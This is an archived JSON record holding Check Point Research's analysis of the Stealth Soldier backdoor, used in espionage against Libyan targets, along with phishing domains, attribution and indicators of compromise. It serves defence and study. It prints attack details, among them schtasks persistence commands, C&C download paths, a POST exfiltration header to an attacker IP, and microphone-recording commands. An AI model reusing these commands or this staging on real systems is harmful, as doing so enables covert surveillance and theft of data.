{
	"id": "e89e62dc-a9c1-4c42-9717-8f72758dccc6",
	"created_at": "2026-04-06T00:07:27.976426Z",
	"updated_at": "2026-04-10T03:30:57.025804Z",
	"deleted_at": null,
	"sha1_hash": "69c2125fa05f705cfefa501dbfb90af83f7d137c",
	"title": "Stealth Soldier Backdoor Used in Targeted Espionage Attacks in North Africa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 123977,
	"plain_text": "Stealth Soldier Backdoor Used in Targeted Espionage Attacks in\r\nNorth Africa\r\nBy etal\r\nPublished: 2023-06-08 · Archived: 2026-04-05 21:32:36 UTC\r\nKey findings\r\nCheck Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new\r\ncustom modular backdoor.\r\nStealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such\r\nas file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.\r\nThe Stealth Soldier infrastructure has some overlaps with infrastructure the The Eye on the Nile which\r\noperated against Egyptian civilian society in 2019. This is the first possible re-appearance of this threat\r\nactor since then.\r\nThe newest version of the backdoor we found was Version 9, likely delivered in February 2023. The oldest\r\nversion we found was Version 6, compiled in October 2022.\r\nThere are indications that the malware C\u0026C servers are related to a larger set of domains, likely used for\r\nphishing campaigns. Some of the domains masquerade as sites belonging to the Libyan Foreign Affairs\r\nMinistry.\r\nIntroduction\r\nCheck Point Research identified an ongoing operation against targets in North Africa involving a previously\r\nundisclosed multi-stage backdoor called Stealth Soldier. The malware Command and Control (C\u0026C) network is\r\npart of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.\r\nBased on what we observed in the phishing website themes and VirusTotal submissions, the campaign appears to\r\ntarget Libyan organizations.\r\nIn this article, we discuss the different techniques and tools used in this operation and its infrastructure. We also\r\nprovide technical analysis of the different Stealth Soldier versions. 
In addition, we discuss the similarities between\r\nthis operation and “Eye on the Nile”, another campaign targeting the region that was linked\r\nby Amnesty and Check Point Research to government-backed bodies.\r\nStealth Soldier\r\nOur investigation began when we came across multiple files submitted to VirusTotal from Libya between\r\nNovember 2022 and January 2023. The file names were in Arabic:  وعاجل هام.exe (Important and\r\nUrgent.exe)  and  401 برقية.exe (Telegram 401.exe) , where “Telegram” is meant in the sense of a telegraph message\r\nand not the Telegram application. Analysis of the files reveals that all of them are downloaders for different\r\nversions of the same malware, internally named Stealth Soldier.\r\nhttps://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/\r\nPage 1 of 13\n\nStealth Soldier is a custom implant, likely used in a limited set of targeted attacks. The implant enables\r\nsurveillance operations and supports functionality such as keystroke logging and screenshot and microphone\r\nrecordings. The different versions found suggest that Stealth Soldier is actively maintained as of January 2023, the\r\ncompilation timestamp of its latest version.\r\nExecution Flow\r\nThe execution flow for all Stealth Soldier versions begins with the execution of the downloader, which triggers the\r\ninfection chain. Although the delivery mechanism of the downloader is currently unknown, the file names suggest\r\nthey were delivered using social engineering. The malware infection chain is complex and contains several files,\r\nall of which are downloaded from the C\u0026C server. During the infection process, the malware downloads a total of\r\n6 (!) files from the C\u0026C servers. The main ones are:\r\nLoader ( MSDataV5.16945.exe ) – Downloads PowerPlus, an internal module to run PowerShell\r\ncommands, and uses it to create persistence for the watchdog. 
Runs Stealth Soldier’s final payload.\r\nWatchdog ( MSCheck.exe ) – Periodically checks for an updated version of the Loader and runs it.\r\nPersists via a scheduled task and the Registry Run key.\r\nPayload ( MShc\u003cVersion\u003e.txt ) – Collects data, receives commands from the C\u0026C server, and executes\r\nmodules.\r\nThe workflow below details the full execution scheme of Stealth Soldier Version 9.\r\nFigure 1 – Infection flow for Stealth Soldier (Version 9).\r\n1. The downloader downloads and opens a decoy empty PDF file. It then downloads the loader\r\nfrom  filecloud[.]store/sensaxcv/msupdate_enc.txt  and decrypts it with XOR keys\r\ninto  %APPDATA%/MSDataV5.16945.exe .\r\n2. The loader ( MSDataV5.16945.exe ) downloads an additional module named  pwls.dll , internally called\r\nPowerPlus. This module is written in .NET and executes PowerShell code. In addition, it checks for the\r\npresence of  TempDataDr\\MSCheck.exe , and if this file doesn’t exist, the loader downloads and executes it.\r\nIt later uses PowerPlus to run two commands, one of them for persistence and the other for querying details\r\nabout the task into a file named DRSch.\r\nschtasks /Query /TN MSChk \u003eC:\\Users\\Public\\DRSch\r\nschtasks.exe /create /sc minute /tn MSChk /tr '\\TempDataDr\\MSCheck.exe' /mo 15 /F\r\nFigure 2 – PowerPlus main logic.\r\n3. The watchdog ( MSCheck.exe ) checks if  MSDataV5.16945.exe  exists in a directory\r\nnamed  TempDataLa.  If it doesn’t, then the watchdog downloads the file from the C\u0026C (from\r\nURI  /msupdate_enc_new.txt  ) and decrypts it, likely as an update mechanism. It then runs the Loader.\r\n4. The Loader checks the version of Stealth Soldier, stored in the file  MV.txt , which it downloads from the\r\nC\u0026C. 
Depending on the version embedded within the  txt  file, it appends that number to the name of the\r\nfinal payload in the format  MShc\u003cVersion\u003e.txt .\r\n5. Finally, the malware decrypts the payload before running it as a shellcode from the MZ header with\r\nthe  CreateThread  API. The shellcode loads the payload and passes the execution to its main logic.\r\nThe flow is similar for all versions of the malware, with the main difference being the payload and the C\u0026C\r\nserver. Version 6 communicates with  filestoragehub[.]live , Version 8 communicates\r\nwith  customjvupdate[.]live  and Version 9 communicates with  filecloud[.]store .\r\nTechnical Analysis\r\nPayload\r\nThe payload starts by collecting information from the victim:\r\nHostname and Username, used to create the Identifier Name (hostname + username)\r\nDrive List (or as the attackers call it, “DriverList”) includes:\r\nDrive Name\r\nFree Disk Space\r\nDrive Type (Removable, Fixed, CDRom or Unknown)\r\nAll files inside the path  “C:\\\\Users\\\\Public\\\\KLData\\\\”  – All files from the keylogger module.\r\nThe information is sent in separate packets, XORed with the key string  “Windows Cmd” , to the\r\nIP  94.156.33.228 .\r\nThe POST request has the following headers:\r\nPOST /Server/Request HTTP/1.1\r\nHost: webadmin.com\r\nUser-Agent: Mozilla/5.0 XXXABCXXX **Stealth Soldier**\r\nContent-Type: text/xml; charset=utf-16-le\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nConnection: 
keep-alive\r\nCustom-Ending: XXXEnDOfHeader\r\nThe malware sends the string  Request for new tasks  to the C\u0026C, which responds with the commands.\r\nCommand list\r\nThe malware uses different types of commands: some are plugins that are downloaded from the C\u0026C and some\r\nare modules inside the malware. For example,  MicRecord  runs in the context of the malware itself and not as an\r\nexternal plugin. 
The recording is performed using the  mciSendStringA  API and the following command lines:\r\nopen new type waveaudio alias Record1\r\nset Record1 time format ms\r\nset Record1 bitspersample 16\r\nset Record1 samplespersec 16000\r\nset Record1 bytespersec 8000\r\nset Record1 channels 2\r\nrecord Record1 notify\r\nstop Record1\r\nsave Record1 \"C:\\\\Users\\\\Public\\\\1.wav\"\r\nclose Record1\r\nBelow is the full list of supported Stealth Soldier commands:\r\nCommand | Arguments | Description | Implant response | Implant possible error\r\nDirectoryList | Directory name | Sends all directory content | “Directory List of is:” + filenames | “Error occured in getting Folder Contents” + “Managed to Count %d Files Before Error”\r\nUploadFile | filename | Uploads the file to the C\u0026C | File content + “File Uploaded Successfully ” | “File Failed to be uploaded”\r\nScreenshot | – | Runs sc.exe and sends to C\u0026C | “ScreenShot Taken Successfully” + “Image to be uploaded = 1.png” + “ScreenShot Taken \u0026 Uploaded Successfully” | “Error Occured in Creating ScreenShot Process”\r\nMicRecord | sleep time | Records the victim’s computer and sends it to C\u0026C | “C:\\Users\\Public\\1.wav” + content + “Recording Saved \u0026 Uploaded Successfully” | “Failed to Upload Recording File”\r\nKeylogger | – | Runs plugin kl.exe (downloads it from C\u0026C) | “KeyLogger Task Started Successfully” | “Error Occured in Creating KeyLogger Process”\r\nBrowserCreds | – | Runs BrCr.exe module (downloads it from C\u0026C) | “BrowserCreds Task Started Successfully” | “Error Occured in Creating BrowserCreds Process”\r\nCmdExec | command | Runs PowerShell command with PowerPlus module (pwls.dll). The result of the command will be in C:\\Users\\Public\\Exec. | “CommandExecutionResult for Command: … is:” + “Command : : Executed and Result Sent Successfully” | “Command : : Executed but Failed to Upload Result” or “Command : : Failed to be Executed”\r\nPlugins\r\nThe payload runs several plugins: first it downloads them, then writes them to their respective filenames, and finally\r\nexecutes them. At the time of our analysis, some of the modules were no longer available for download.\r\nScreen Capture\r\nThe screen capture plugin is called  sc.exe  and is downloaded from the C\u0026C server. It is a compiled .NET open-source project named https://github.com/bencevans/screenshot-desktop. 
The module supports the following\r\narguments (can be seen using the flag /h or /help):\r\n\u003cfilename\u003e captures the screen or the active window and saves it to a file.\r\nUsage: filename [WindowTitle]\r\nfilename - the file where the screen capture will be saved\r\nallowed file extensions are - Bmp,Emf,Exif,Gif,Icon,Jpeg,Png,Tiff,Wmf.\r\nWindowTitle - instead of capture whole screen you can point to a window\r\nwith a title which will put on focus and captuted.\r\nFor WindowTitle you can pass only the first few characters.\r\nIf don't want to change the current active window pass only\r\nThe default name for the screenshot is  screenshot.bmp  for full-screen screenshots. 
The module also supports\r\nscreenshots of a specific window.\r\nBrowser Credentials\r\nThis plugin is called  BrCr.txt . It starts with another loader that downloads the next stage from the\r\nURI  /BRCRLa_enc.txt , decrypts and writes it to  C:\\Users\\Public\\BRCRLa.exe , and then executes it. It is\r\nfollowed by another layer of downloads that retrieve the final payload from  /BRCRShc.txt . The module runs in\r\nmemory after it is decrypted: the loader runs it from the first byte, which is part of the MZ header. This header\r\ncalls a shellcode that resides at the end of the file. The shellcode loads the file itself and then runs from the\r\nentry point.\r\nThe real plugin is the open-source project https://github.com/moonD4rk/HackBrowserData, a utility to decrypt browser data from the most popular browsers.\r\nEncryption\r\nThe malware’s different stages use the same kind of encryption for their strings, communication and payloads.\r\nIn most stages the data is XORed with two hardcoded strings (in the payload, however, the strings are\r\nXORed with only one hardcoded string). The strings used as XOR keys masquerade as legitimate strings, which\r\nmakes the malware harder to spot.\r\nThe different XOR keys we encountered are:\r\n“Windows CRT”\r\n“Microsoft Windows”\r\n“WINDOWS NT”\r\n“Windows NT”\r\n“Command Prompt”\r\n“system32”\r\n“Windows 10”\r\nFigure 3 – Encryption keys and the encryption domain string.\r\nVersions\r\nWe observed 3 infection chains of Stealth Soldier malware with different versions depending on the payload – 6, 8\r\nand 9. The flows were pretty similar, and had the same logic. The differences between the versions indicate active\r\ndeployment and possible rearrangement of plugins. 
For example, the payloads in earlier versions (before Version\r\n9) didn’t contain the BrowserCreds module.\r\nAdditional differences include the filenames, mutex names, XOR keys and directory names. There is also a\r\ndifference in the value name set under the  SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run  key for persistence:\r\n“Cache”  – Version 6\r\n“WinUpdate”  – Version 8\r\n“DevUpdate”  – Version 9\r\nThe watchdog also changed between the versions. In Version 6 it only checks if the second stage ( MSCheck.exe )\r\nexists and, if it doesn’t, downloads a new one with the same name.\r\nIn Version 8, the  MSCheck.exe  watchdog checks if the second-stage loader  MSUpdate.exe  exists in the\r\ndirectory  MSTemp.  If it doesn’t, the watchdog tries to read and decrypt from  MSUVersion.txt  an address from\r\nwhich to download an updated version. This is different from Version 9, where the update mechanism tries directly\r\nto download the whole file. On Version 9’s C\u0026C server  filecloud[.]store , we found\r\nan  MSUVersion.txt  file that leads to the address  https://msheartbeat[.]live/sensaxcv/MSUpdate2.txt , which\r\nmay indicate that this C\u0026C was also used in the past.\r\nPhishing domains\r\nHistoric PDNS resolutions reveal that the C\u0026C\r\ndomains  customjvupdate[.]live  and  filestoragehub[.]live  resolved in the past to IP addresses in the same\r\nASN on the IP range  185.125.230.0/24 . Actively hunting for malicious activity within this ASN, we were able\r\nto retrieve a limited set of domains that were likely used to impersonate the Libyan Ministry of Foreign Affairs in\r\na phishing attempt. 
Among those domains were:\r\nforeign.gov.ly.webmailogemail.com\r\nmofa.gov.ly.loginlive.loglivemail.com\r\nms.mf.ly.loglivemail.com\r\nms.lybia.loglivemail.com\r\nly.loginlive.loglivemail\r\nforeign.gov.ly.2096.website\r\nThe newly-found phishing domains were hosted on IPs that also hosted additional phishing domains with similar\r\nregistration patterns. Pivoting off those patterns and using hosting history and similar naming conventions, mostly\r\ncombinations of the keywords  mail / notify / verify / web / log / live , we were able to identify more than\r\n50 domains with similar characteristics.\r\nFigure 4 – Phishing Infrastructure.\r\nMost of the domains were unresponsive during our analysis. Many of them have subdomains with name patterns\r\nsuch as “ mail.yahoo ”, “ livemail ”, “ telegram.org ” and “ login.outlook ”, which strongly suggests that\r\nthey were intended to be used in a phishing campaign.\r\nAttribution\r\nDuring our analysis, we found some overlaps between the infrastructure used in this operation and another\r\ncampaign, Eye on the Nile, which is aimed at targets in the North Africa region.\r\nThe IP  185.125.230.116 , to which the Version 8 C\u0026C  customjvupdate[.]live  resolved, was also resolved to by\r\nmultiple Eye on the Nile domains:  weblogin.live , mailsecure.live , verifymail.live . 
In addition, the\r\nnaming convention used in the phishing domain cluster,  mail / notify / verify / web / log / live , is the\r\nsame one used in the Eye on the Nile campaign.\r\nEye on the Nile\r\nThe 2019 report by Amnesty International describes how Egyptian civil society organizations and individuals were\r\ntargeted with sophisticated phishing attacks using third-party applications, such as Google and Yahoo, to steal\r\nsensitive information and monitor their activities. In a follow-up report, Eye on the Nile, we uncovered the\r\nbackground of this operation, tracked its origin, and connected it to a surveillance-focused Android backdoor.\r\nThroughout the analysis of Stealth Soldier campaigns, we were able to identify several infrastructure overlaps\r\nwith known Eye on the Nile domains. This comes on top of the narrow regional targeting and the similar phishing domain\r\nnaming patterns.\r\nFigure 5 – Eye on the Nile Infrastructure as previously reported by Check Point Research.\r\nConclusion\r\nThis report describes a previously undocumented malware campaign targeting Libya, a country that is not often\r\nthe focus of APT reports. The investigation suggests that the attackers behind this campaign are politically\r\nmotivated and are utilizing the Stealth Soldier malware and a significant network of phishing domains to conduct\r\nsurveillance and espionage operations against Libyan and Egyptian targets.\r\nGiven the modularity of the malware and the use of multiple stages of infection, it is likely that the attackers will\r\ncontinue to evolve their tactics and techniques and deploy new versions of this malware in the near future.\r\nFinally, our analysis revealed a connection to the previously exposed “Eye on the Nile” campaign. 
This\r\nconnection raises the possibility that the current operation may have additional undetected components, such as a\r\nmobile backdoor that was used in the earlier campaign but has not been observed since.\r\nCheck Point Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating\r\nsystems, and has developed and deployed a signature named Trojan.Wins.StealthSoldier.ta to protect against\r\nthe threat described in this research.\r\nProtections\r\nCheck Point Threat Emulation:\r\nTrojan.Wins.StealthSoldier.ta.A\r\nTrojan.Wins.StealthSoldier.ta.B\r\nTrojan.Wins.StealthSoldier.ta.C\r\nTrojan.Wins.StealthSoldier.ta.D\r\nCheck Point Anti-Bot:\r\nBackdoor.WIN32.StealthSoldier.A\r\nBackdoor.WIN32.StealthSoldier.B\r\nIOCs:\r\nDomains:\r\nfilestoragehub[.]live\r\ncustomjvupdate[.]live\r\nfilecloud[.]store\r\nwebmailogemail[.]com\r\nloglivemail[.]com\r\n2096[.]website\r\nIPs:\r\n185.125.230.216\r\n185.125.230.116\r\n94.156.33.228\r\n94.156.33.229\r\n185.125.230.224\r\n185.125.230.220\r\nHashes:\r\n2cad816abfe4d816cf5ecd81fb23773b6cfa1e85b466d5e5a48112862ceb3efb\r\n05db5e180281338a95e43a211f9791bd53235fca1d07c00eda0be7fdc3f6a9bc\r\nb9e9b93e99d1a8fe172d70419181a74376af8188dcb03249037d4daea27f110e\r\nd57fc4e8c14da6404bdcb4e0e6ac79104386ffbd469351c2a720a53a52a677db\r\ne7794facf887a20e08ed9855ac963573549809d373dfe4a287d1dae03bffc59f\r\n8c09a804f408f7f9edd021d078260a47cf513c3ce339c75ebf42be6e9af24946\r\ndf6a44551c7117bc2bed2158829f2d0472358503e15d58d21b0b43c4c65ff0b4\r\ne546d48065ff8d7e9fef1d184f48c1fd5e90eb0333c165f217b0fb574416354f\r\na43ababe103fdce14c8aa75a00663643bf5658b7199a30a8c5236b0c31f08974\r\nc0b75fd1118dbb86492a3fc845b0739d900fbbd8e6c979b903267d422878dbc6\r\ncb90a9e5d8b8eb2f81ecdbc6e11fba27a3dde0d5ac3d711b43a3370e24b8c90a\r\nd6655e106c5d85ffdce0404b764d81b51de54447b3bb6352c5a0038d2ce19885\r\nb94257b4c1fac163184b2d6047b3d997100dadf98841800ec9219ba75bfd5723\r\n7bfe2a03393184d9239c90d018ca2fdccc1d4636dfb399b3a71ea6d5682c92bd\r\nSource: https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/"
	],
	"report_names": [
		"stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434047,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/69c2125fa05f705cfefa501dbfb90af83f7d137c.pdf",
		"text": "https://archive.orkl.eu/69c2125fa05f705cfefa501dbfb90af83f7d137c.txt",
		"img": "https://archive.orkl.eu/69c2125fa05f705cfefa501dbfb90af83f7d137c.jpg"
	}
}